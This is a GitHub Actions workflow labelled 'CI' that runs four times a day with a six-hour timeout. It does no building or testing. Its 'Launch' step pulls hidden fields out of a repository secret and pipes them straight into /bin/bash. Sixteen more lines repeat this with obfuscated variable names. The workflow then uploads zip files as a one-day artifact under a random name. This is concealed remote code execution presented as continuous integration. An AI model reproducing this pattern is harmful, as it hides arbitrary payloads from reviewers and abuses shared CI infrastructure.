name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '13 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          u075: ${{ secrets.u075 }}
        run: |
          printf '%s' "$u075" | jq -r .fbh6 | /bin/bash
          printf '%s' "$ulh6430" | jq -r .fn38859 | /bin/bash
          echo $dkx71183 | jq -r .lvqpq8 | /bin/bash
          echo $u08994 | jq -r .jjhab38 | /bin/bash
          echo $aezx0 | jq -r .fpoo1809 | /bin/bash
          echo $ub77211 | jq -r .uo028 | /bin/bash
          printf '%s' "$pt642" | jq -r .a6553 | /bin/bash
          echo $wxw92 | jq -r .as0922 | /bin/bash
          echo $olob978 | jq -r .mahv29145 | /bin/bash
          echo $skw6617 | jq -r .f3771 | /bin/bash
          echo $h0 | jq -r .kb55179 | /bin/bash
          echo $xd857 | jq -r .n10352 | /bin/bash
          printf '%s' "$vywy82" | jq -r .jcy37 | /bin/bash
          printf '%s' "$kajxd2" | jq -r .r95 | /bin/bash
          echo $yiv68607 | jq -r .huqij31958 | /bin/bash
          echo $kws7 | jq -r .dddi99591 | /bin/bash
          printf '%s' "$mqy25" | jq -r .rq6 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: 3VDJJlon
          path: "*.zip"
          retention-days: 1
